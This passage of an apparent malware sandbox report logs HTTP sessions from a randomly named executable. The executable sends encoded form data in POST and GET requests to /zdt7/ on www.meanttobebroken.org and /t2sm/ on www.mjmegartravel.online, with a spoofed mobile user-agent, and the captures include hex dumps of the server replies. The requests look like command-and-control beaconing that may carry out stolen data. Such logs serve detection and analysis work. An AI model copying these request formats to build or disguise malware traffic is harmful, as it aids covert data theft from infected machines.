                                                                                            Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                            Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                            Oct 24, 2024 15:30:57.455192089 CEST1236INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                            Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
                                                                                            Oct 24, 2024 15:30:57.455228090 CEST1236INData Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a
                                                                                            Data Ascii: 'X'9.F472*qx_>\+K_uDZW|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
                                                                                            Oct 24, 2024 15:30:57.455262899 CEST1236INData Raw: 5b b2 f7 ac c0 3b b3 fc a6 f7 28 f7 1a 97 00 09 b6 b8 d7 2e 33 04 ed c0 f2 cf da 96 b7 32 03 34 b6 2d df 2b 1b bf 4b 14 cd 72 65 0d 15 12 bb f9 57 58 95 76 08 bc 53 ab d5 b1 5a 9d c7 98 c3 32 6b 39 14 78 0a 6c 1f 26 81 1d 83 10 34 cf ac f2 ff 95
                                                                                            Data Ascii: [;(.324-+KreWXvSZ2k9xl&4t-eGsyftN-+h`+>[~CnjZji,k[g&:[uf>jA:~XAS>C+hyqS<?e^;S[Vm&j/{gu}4=TlZT<?
                                                                                            Oct 24, 2024 15:30:57.455301046 CEST848INData Raw: ce bc b5 c1 bc 04 da e4 bf aa 4c 5b 14 8f e1 82 ea 72 2c 77 9f b2 b2 49 61 43 a9 a8 2a 28 ab 10 7b 1f 53 f9 e5 f7 0f f5 45 6e f1 5a 91 db ef 9f 7f da 87 d1 7d 96 f2 22 72 8a 51 f1 86 8b 58 d7 af b9 fa d3 0e 87 87 7d 75 f1 53 56 ab 12 ce 19 6f 79
                                                                                            Data Ascii: L[r,wIaC*({SEnZ}"rQX}uSVoy-4R7(V46">r,j}qC14<H_Ccq+hJ;qLr#-E]uzC~LP#0Uu`;D5([@)KPP}@}%8
                                                                                            Oct 24, 2024 15:30:57.455355883 CEST608INData Raw: 23 14 a2 45 0d 4b e5 2b 30 6f a7 1f e2 06 da 22 b1 d9 3b 3c 58 d6 42 b2 5c cb f3 6e 04 c7 37 9a fe 01 1d a2 c6 92 83 a3 45 14 5f 57 2d 5a 48 12 7f 80 cf a5 a0 6f ba 34 0f 1d 85 21 3a 39 41 9a c4 c1 52 aa 65 ee 81 59 09 85 2a 21 ad 68 aa a7 5a 7a
                                                                                            Data Ascii: #EK+0o";<XB\n7E_W-ZHo4!:9AReY*!hZzP;22$yDX/V22E)d9|dD&#1k(+90FpC"SJ^e]Vu/Gj*x,40v+'`*85vc


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            18192.168.2.550001141.193.213.11803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:30:59.309420109 CEST717OUTPOST /zdt7/ HTTP/1.1
                                                                                            Host: www.meanttobebroken.org
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.meanttobebroken.org
                                                                                            Referer: http://www.meanttobebroken.org/zdt7/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 227
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 44 66 61 7a 76 70 70 51 61 4c 44 51 44 74 79 57 72 30 6e 74 4a 49 71 47 37 79 45 51 68 42 54 30 79 73 6b 44 47 79 69 32 71 35 74 74 45 37 37 48 47 32 49 55 62 41 6b 33 71 44 4a 57 4a 56 38 79 59 74 6b 43 65 55 46 6a 37 71 4a 41 6a 5a 54 69 4a 42 76 50 73 69 70 37 62 31 74 48 7a 67 31 30 6f 64 41 34 6e 4d 38 77 59 36 52 63 36 4c 36 64 4a 35 45 38 63 2f 32 2f 7a 38 59 4e 43 6b 79 48 6f 4a 44 54 6e 61 76 74 4e 57 30 71 35 78 39 6d 65 30 37 52 65 56 55 39 45 39 2b 45 6e 50 4d 75 51 53 4c 48 36 41 35 6e 69 4b 33 77 6e 66 77 66 41 42 68 63 58 75 65 6a 62 55 35 72 6a 43 43 37 45 68 73 56 2f 7a 56 4d 4e 53 58 67 72 44 73 4a 38 56 4d 63 39 76 32 56 38 76 51 47
                                                                                            Data Ascii: pZxtux=DfazvppQaLDQDtyWr0ntJIqG7yEQhBT0yskDGyi2q5ttE77HG2IUbAk3qDJWJV8yYtkCeUFj7qJAjZTiJBvPsip7b1tHzg10odA4nM8wY6Rc6L6dJ5E8c/2/z8YNCkyHoJDTnavtNW0q5x9me07ReVU9E9+EnPMuQSLH6A5niK3wnfwfABhcXuejbU5rjCC7EhsV/zVMNSXgrDsJ8VMc9v2V8vQG
                                                                                            Oct 24, 2024 15:31:00.032210112 CEST1236INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:30:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding
                                                                                            x-powered-by: WP Engine
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a531bfb01e5c2-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                            Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                            Oct 24, 2024 15:31:00.032474995 CEST1236INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                            Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
                                                                                            Oct 24, 2024 15:31:00.032490015 CEST1236INData Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a
                                                                                            Data Ascii: 'X'9.F472*qx_>\+K_uDZW|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
                                                                                            Oct 24, 2024 15:31:00.032597065 CEST1236INData Raw: 5b b2 f7 ac c0 3b b3 fc a6 f7 28 f7 1a 97 00 09 b6 b8 d7 2e 33 04 ed c0 f2 cf da 96 b7 32 03 34 b6 2d df 2b 1b bf 4b 14 cd 72 65 0d 15 12 bb f9 57 58 95 76 08 bc 53 ab d5 b1 5a 9d c7 98 c3 32 6b 39 14 78 0a 6c 1f 26 81 1d 83 10 34 cf ac f2 ff 95
                                                                                            Data Ascii: [;(.324-+KreWXvSZ2k9xl&4t-eGsyftN-+h`+>[~CnjZji,k[g&:[uf>jA:~XAS>C+hyqS<?e^;S[Vm&j/{gu}4=TlZT<?
                                                                                            Oct 24, 2024 15:31:00.032774925 CEST848INData Raw: ce bc b5 c1 bc 04 da e4 bf aa 4c 5b 14 8f e1 82 ea 72 2c 77 9f b2 b2 49 61 43 a9 a8 2a 28 ab 10 7b 1f 53 f9 e5 f7 0f f5 45 6e f1 5a 91 db ef 9f 7f da 87 d1 7d 96 f2 22 72 8a 51 f1 86 8b 58 d7 af b9 fa d3 0e 87 87 7d 75 f1 53 56 ab 12 ce 19 6f 79
                                                                                            Data Ascii: L[r,wIaC*({SEnZ}"rQX}uSVoy-4R7(V46">r,j}qC14<H_Ccq+hJ;qLr#-E]uzC~LP#0Uu`;D5([@)KPP}@}%8
                                                                                            Oct 24, 2024 15:31:00.033045053 CEST608INData Raw: 23 14 a2 45 0d 4b e5 2b 30 6f a7 1f e2 06 da 22 b1 d9 3b 3c 58 d6 42 b2 5c cb f3 6e 04 c7 37 9a fe 01 1d a2 c6 92 83 a3 45 14 5f 57 2d 5a 48 12 7f 80 cf a5 a0 6f ba 34 0f 1d 85 21 3a 39 41 9a c4 c1 52 aa 65 ee 81 59 09 85 2a 21 ad 68 aa a7 5a 7a
                                                                                            Data Ascii: #EK+0o";<XB\n7E_W-ZHo4!:9AReY*!hZzP;22$yDX/V22E)d9|dD&#1k(+90FpC"SJ^e]Vu/Gj*x,40v+'`*85vc


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            19192.168.2.550002141.193.213.11803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:01.854455948 CEST1734OUTPOST /zdt7/ HTTP/1.1
                                                                                            Host: www.meanttobebroken.org
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.meanttobebroken.org
                                                                                            Referer: http://www.meanttobebroken.org/zdt7/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 1243
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 44 66 61 7a 76 70 70 51 61 4c 44 51 44 74 79 57 72 30 6e 74 4a 49 71 47 37 79 45 51 68 42 54 30 79 73 6b 44 47 79 69 32 71 2f 31 74 45 71 62 48 46 52 6b 55 61 41 6b 33 67 6a 4a 58 4a 56 39 71 59 74 63 47 65 55 4a 5a 37 76 4e 41 68 2f 76 69 5a 77 76 50 6d 69 70 37 55 56 74 47 72 41 31 68 6f 64 51 43 6e 49 51 77 59 36 52 63 36 4d 43 64 41 49 45 38 65 2f 32 38 6a 73 59 2f 47 6b 79 76 6f 4a 4c 6c 6e 61 72 62 4d 6c 38 71 34 52 74 6d 54 68 58 52 43 46 55 2f 44 39 2b 63 6e 50 52 73 51 53 58 4c 36 42 64 42 69 4b 50 77 6d 4a 6f 49 48 6c 56 54 45 59 43 35 56 6b 70 6d 32 32 32 66 4e 67 6f 30 33 44 55 6f 45 68 76 33 6b 47 30 32 78 78 42 48 2f 75 75 57 39 4b 39 2b 34 65 67 42 48 62 33 50 41 49 43 4e 2f 47 61 56 6f 2f 70 58 67 39 78 75 74 76 42 62 33 36 69 68 58 32 49 6b 63 64 34 68 6d 65 4e 64 75 41 74 71 38 48 69 75 69 58 5a 6b 30 6a 32 32 7a 53 4c 30 73 42 6b 44 4b 36 6f 67 30 49 59 6e 69 5a 49 65 44 48 71 5a 45 79 70 66 49 53 62 6c 34 50 44 59 71 49 4d 67 71 66 69 7a 4a 76 63 52 4b 41 74 [TRUNCATED]
                                                                                            Data Ascii: pZxtux=DfazvppQaLDQDtyWr0ntJIqG7yEQhBT0yskDGyi2q/1tEqbHFRkUaAk3gjJXJV9qYtcGeUJZ7vNAh/viZwvPmip7UVtGrA1hodQCnIQwY6Rc6MCdAIE8e/28jsY/GkyvoJLlnarbMl8q4RtmThXRCFU/D9+cnPRsQSXL6BdBiKPwmJoIHlVTEYC5Vkpm222fNgo03DUoEhv3kG02xxBH/uuW9K9+4egBHb3PAICN/GaVo/pXg9xutvBb36ihX2Ikcd4hmeNduAtq8HiuiXZk0j22zSL0sBkDK6og0IYniZIeDHqZEypfISbl4PDYqIMgqfizJvcRKAtJbKIS7SmxDHgpMFvv/DziGWW6eY9WpDx6FDlIY0lgjLYunkY7D76t6cU4HXCLBoJIDSJFFR0BSTQUweGQGbe1UiTo7J10LM85tyAoJKbt40rWHtIKnPbfv9DonVftjmolQlZMtCzaf5ipsxoSpGFa8yoj7AcWQBL8yh6Yi+wu8NCi/ukVQlNAW2Lg2z5gLT6kJruLEEMljyoDItmlRN7YX2BcRI7JMyE/sTc0kC1zAKQ+qd5z61JNPpLDfzKYMnqkHZhtnPh2wxaPc/Edc4vnEvhfjR+TUJqnF2MXmWyNEPvBPzH/6FKmjdhbMshoD39C4kGZfla53zFjZ7IF/BqjmmSGz0mx0UZgd++MozDMkJKBOG4WiI4HLwWyv6YY6d1NZAOZkU00AvMQbGYLnb0RZtv6ztMawVqUQeVmRWCofhPL6+Q48KuWUOtUdBLn/nWyT6/pK190NMyovrDIvD+iCrvXZRh3jO0rEqqsRrUWrwZLWrst+AEHUBiGYUJG6YzxXDmU2AjqMUE41OVrCCm+BZFTPOq9+fj4DcL0vX+BlWOJw4nsAyknU4YV6nQLUMV1ZC4GntlZPJ7uBKsDNdw98IxKokT3ysIJo6z6xGWVKUsQrhoGl6WzNeEF1JviTTdn8zpsQw03KdwI42Mbdc8s858ZY2F7bm7mN [TRUNCATED]
                                                                                            Oct 24, 2024 15:31:02.537142992 CEST1236INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 24 Oct 2024 13:31:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding
                                                                                            x-powered-by: WP Engine
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a532bdfc4e510-DFW
                                                                                            Content-Encoding: gzip
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                            Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                            Oct 24, 2024 15:31:02.537198067 CEST1236INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                            Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
                                                                                            Oct 24, 2024 15:31:02.537235975 CEST1236INData Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a
                                                                                            Data Ascii: 'X'9.F472*qx_>\+K_uDZW|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
                                                                                            Oct 24, 2024 15:31:02.537261009 CEST1236INData Raw: 5b b2 f7 ac c0 3b b3 fc a6 f7 28 f7 1a 97 00 09 b6 b8 d7 2e 33 04 ed c0 f2 cf da 96 b7 32 03 34 b6 2d df 2b 1b bf 4b 14 cd 72 65 0d 15 12 bb f9 57 58 95 76 08 bc 53 ab d5 b1 5a 9d c7 98 c3 32 6b 39 14 78 0a 6c 1f 26 81 1d 83 10 34 cf ac f2 ff 95
                                                                                            Data Ascii: [;(.324-+KreWXvSZ2k9xl&4t-eGsyftN-+h`+>[~CnjZji,k[g&:[uf>jA:~XAS>C+hyqS<?e^;S[Vm&j/{gu}4=TlZT<?
                                                                                            Oct 24, 2024 15:31:02.537282944 CEST1236INData Raw: ce bc b5 c1 bc 04 da e4 bf aa 4c 5b 14 8f e1 82 ea 72 2c 77 9f b2 b2 49 61 43 a9 a8 2a 28 ab 10 7b 1f 53 f9 e5 f7 0f f5 45 6e f1 5a 91 db ef 9f 7f da 87 d1 7d 96 f2 22 72 8a 51 f1 86 8b 58 d7 af b9 fa d3 0e 87 87 7d 75 f1 53 56 ab 12 ce 19 6f 79
                                                                                            Data Ascii: L[r,wIaC*({SEnZ}"rQX}uSVoy-4R7(V46">r,j}qC14<H_Ccq+hJ;qLr#-E]uzC~LP#0Uu`;D5([@)KPP}@}%8
                                                                                            Oct 24, 2024 15:31:02.537298918 CEST220INData Raw: 46 38 87 fc 81 de 32 cc e3 12 e8 1d 2b a6 1c b6 b0 e8 38 62 c5 b4 87 02 2f 68 a1 87 e0 0e fa 31 4d 91 82 14 08 ce ef f8 1d 81 b5 76 b1 69 35 9d 6e d4 e3 32 ff af a6 07 65 46 9a 0f 59 f9 35 2e 57 9b b4 4c fe 8b 24 af b7 ea 2b b4 57 6a b5 af b7 bc
                                                                                            Data Ascii: F82+8b/h1Mvi5n2eFY5.WL$+Wj)`fyJ<vR})nmP?TOg48(% |y|'~lU|t ;UM6]8Q97S0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            20192.168.2.550003141.193.213.11803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:04.416120052 CEST420OUTGET /zdt7/?pZxtux=OdyTsfpKOp+FbfSBk3rtAPX6yl42tFHs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjAvSN+KGdO51cWhvQZ2fU2V4w5zpyWN4cvAtWl9PkRGGXA+g==&C6=EXkTb HTTP/1.1
                                                                                            Host: www.meanttobebroken.org
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Oct 24, 2024 15:31:05.098718882 CEST657INHTTP/1.1 301 Moved Permanently
                                                                                            Date: Thu, 24 Oct 2024 13:31:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            x-powered-by: WP Engine
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://meanttobebroken.org/zdt7/?pZxtux=OdyTsfpKOp+FbfSBk3rtAPX6yl42tFHs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjAvSN+KGdO51cWhvQZ2fU2V4w5zpyWN4cvAtWl9PkRGGXA+g==&C6=EXkTb
                                                                                            X-Cacheable: non200
                                                                                            Cache-Control: max-age=600, must-revalidate
                                                                                            X-Cache: MISS
                                                                                            X-Cache-Group: iphone
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d7a533be9456b95-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            21192.168.2.55000476.223.67.189803648C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 24, 2024 15:31:10.153763056 CEST700OUTPOST /t2sm/ HTTP/1.1
                                                                                            Host: www.mjmegartravel.online
                                                                                            Accept: */*
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Origin: http://www.mjmegartravel.online
                                                                                            Referer: http://www.mjmegartravel.online/t2sm/
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Content-Length: 207
                                                                                            Cache-Control: no-cache
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                            Data Raw: 70 5a 78 74 75 78 3d 77 36 67 2b 58 65 6a 6f 42 31 59 79 42 6f 75 56 63 62 57 33 38 32 67 69 72 4f 76 6a 37 30 76 51 45 78 61 44 67 52 2b 65 46 51 57 38 46 6e 65 4f 71 6a 57 4b 71 32 5a 76 55 6c 6f 79 62 4c 6d 56 32 78 30 4d 58 35 41 41 53 64 58 30 59 72 61 68 5a 30 6f 74 52 66 38 7a 47 6a 4e 37 72 35 50 39 7a 39 76 4c 72 41 4c 30 30 32 57 34 30 33 54 57 4e 44 49 4a 6d 52 62 4d 5a 2f 56 44 31 68 38 59 73 38 37 68 36 35 4e 54 46 66 6a 70 78 36 33 30 64 76 6e 43 42 31 62 6c 77 46 63 5a 79 39 7a 6f 34 5a 46 53 32 56 31 74 2b 4d 63 4d 2b 52 35 47 35 67 74 63 32 43 4b 53 5a 50 6c 66 44 67 67 64 35 67 36 4c 55 6e 38 3d
